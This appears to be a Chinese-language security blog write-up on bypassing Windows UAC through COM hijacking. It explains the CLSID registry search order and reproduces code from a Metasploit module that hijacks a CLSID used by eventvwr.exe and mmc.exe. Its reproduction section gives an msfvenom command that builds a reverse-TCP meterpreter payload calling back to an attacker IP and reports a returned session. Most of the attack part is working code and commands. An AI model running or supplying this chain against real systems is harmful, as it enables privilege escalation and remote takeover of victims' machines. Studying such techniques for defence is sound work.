0x01 Com劫持原理

利用CLSID搜索顺序:

  1. HKCU\Software\Classes\CLSID
  2. HKCR\CLSID
  3. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\

将被劫持的CLSID存入:HKCU\Software\Classes\CLSID

CLSID 结构

1
2
3
4
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID   
{CLSID}
InprocServer32 (Default) = path
ThreadingModel = value

0x02 uacbypass_comhijack分析

判断系统版本

1
2
3
4
5
6
7
def check
if sysinfo['OS'] =~ /Windows (7|8|10|2008|2012|2016)/ && is_uac_enabled? # 从meterpreter中判断OS版本
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end

劫持点:eventvwr.exe 和 mmc.exe

1
2
3
4
5
6
7
8
9
10
11
12
13
@@hijack_points = [
{
name: 'Event Viewer',
cmd_path: '%WINDIR%\System32\eventvwr.exe',
class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
},
{
name: 'Computer Managment',
cmd_path: '%WINDIR%\System32\mmc.exe',
cmd_args: 'CompMgmt.msc',
class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
}
]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def hijack_com(registry_view, dll_path)
target = @@hijack_points.sample
target_clsid = target[:class_ids].sample
root_key = "#{CLSID_PATH}\\{#{target_clsid}}"
inproc_key = "#{root_key}\\InProcServer32"
shell_key = "#{root_key}\\ShellFolder"

registry_createkey(root_key, registry_view)
registry_createkey(inproc_key, registry_view)
registry_createkey(shell_key, registry_view)

registry_setvaldata(inproc_key, DEFAULT_VAL_NAME, dll_path, 'REG_SZ', registry_view)
registry_setvaldata(inproc_key, 'ThreadingModel', 'Apartment', 'REG_SZ', registry_view)
registry_setvaldata(inproc_key, 'LoadWithoutCOM', '', 'REG_SZ', registry_view)
registry_setvaldata(shell_key, 'HideOnDesktop', '', 'REG_SZ', registry_view)
registry_setvaldata(shell_key, 'Attributes', 0xf090013d, 'REG_DWORD', registry_view)

{
name: target[:name],
cmd_path: target[:cmd_path],
cmd_args: target[:cmd_args],
root_key: root_key
}
end

向注册表添加

HKCU\Software\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InProcServer32
HKCU\Software\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}\ShellFolder

InProcServer 中:

  • Default -> dll_path
  • ThreadingModel -> Apartment
  • LoadWithoutCOM -> Null

ShellFolder 中:

  • HideOnDesktop -> Null
  • Attributes -> 0xf090013d

0x03 复现

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.131.36.131 lport=4444 -f exe > out.exe

7b0554d147b29f2ea26ae50de761fd1a
回弹拿到meterpreter session

2e3c6b217fb1c0f6eb5ee8e7e645c081

无法getsystem

141b1b876500404f9687d93866b5a8e2

可以看到,劫持了CLSID {0A29FF9E-7F9C-4437-8B11-F424491E3931}的会话,成功拿到反弹session